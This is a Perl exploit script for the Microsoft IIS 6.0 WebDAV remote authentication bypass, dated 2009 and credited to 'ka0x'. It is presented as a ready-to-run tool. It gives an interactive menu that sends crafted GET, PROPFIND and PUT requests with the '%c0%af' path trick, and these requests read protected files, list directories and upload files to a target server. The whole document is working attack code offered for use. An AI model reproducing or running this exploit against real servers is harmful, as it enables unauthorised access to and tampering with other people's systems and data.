#!/usr/bin/perl -W
#
# Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
# written by ka0x <ka0x01[alt+64]gmail.com>
# Advisory: http://www.milw0rm.com/exploits/8765
#
# Greets: an0de, Piker, xarnuz, NullWave07, Pepelux, k0rde, JoSs, Trancek and others!

use IO::Socket ;

my ( $host, $path ) = @ARGV ;
my $port = 80 ; # webserver port

&usage unless $ARGV[1] ;

$host =~ s/http:\/\/// if($host =~ /^http:\/\//i) ;
$path =~ s/\/// if(substr($path, 0,1) eq '/');

sub _file {
	$file = shift ;
	open(FILE, $file) || die "[-] ERROR: ".$!,"\n" ;
	while( <FILE> ){
		$cont .= $_ ;
	}
	close(FILE) ;
	return $cont ;
}


print "write 'help' for get help list\n";


while( 1 ) {

	my $sock = IO::Socket::INET->new (PeerAddr => $host, 
					PeerPort => $port,
					Proto    => 'tcp') || die "\n[-] ERROR: ".$!,"\n" ;
	print "\$> ";
	chomp( my $option = <STDIN> ) ;
	last if $option eq 'quit' ;

	if($option eq 'source') {
		$path =~ s/\//%c0%af\// ; 
		print $sock "GET /".$path." HTTP/1.1\r\n" ; 
		print $sock "Translate: f\r\n" ;
		print $sock "Host: ".$host."\r\n" ;
		print $sock "Connection: close\r\n\r\n" ;

		while(<$sock>){
			print $_ ;
		}
		close($sock) ;
	}


	elsif($option eq 'path') {
		$path =~ s/\//%c0%af\// ;
		print $sock "PROPFIND  /".$path." HTTP/1.1\r\n" ;
		print $sock "Host: ".$host."\r\n" ;
		print $sock "Connection:close\r\n" ;
		print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
		print $sock "Content-Length: 0\r\n\r\n" ;
		print $sock  '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>' ;

		while(<$sock>){
			print $_ ;
		}
		close($sock) ;
	}


	elsif($option eq 'put') {
		$path =~ s/\//%c0%af\// ;
		print "[*] Insert a local file (ex: /root/file.txt): " ;
		chomp( $local = <STDIN> ) ;
		$file_l = _file( $local ) ;
		print $sock "PUT /".$path."my_file.txt HTTP/1.1\r\n" ;
		print $sock "Host: ".$host."\r\n" ;
		print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
		print $sock "Connection:close\r\n" ;
		print $sock "Content-Length: ".length($file_l)."\r\n\r\n" ;
		print $sock $file_l,"\r\n" ;

		while(<$sock>){
			print $_ ;
		}
		close($sock) ;
	}

	elsif($option eq 'help') {
		print "\n\t\t- OPTIONS -\n\n\n" ;
		print "\thelp\t\tgive this help list\n" ;
		print "\tsource\t\tget file content\n" ;
		print "\tpath\t\tget directory contents\n" ;
		print "\tput\t\tput file\n" ;
		print "\tquit\t\texit exploit\n\n" ;
	}
	
}

sub usage {
	print << 'EOH' ;

  $ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
  $ written by ka0x <ka0x01[at]gmail.com>
  $ 25/05/2009

usage:
   perl $0 <host> <path>

example:
   perl $0 localhost dir/
   perl $0 localhost dir/file.txt

EOH

	exit;
}
	
	


__END__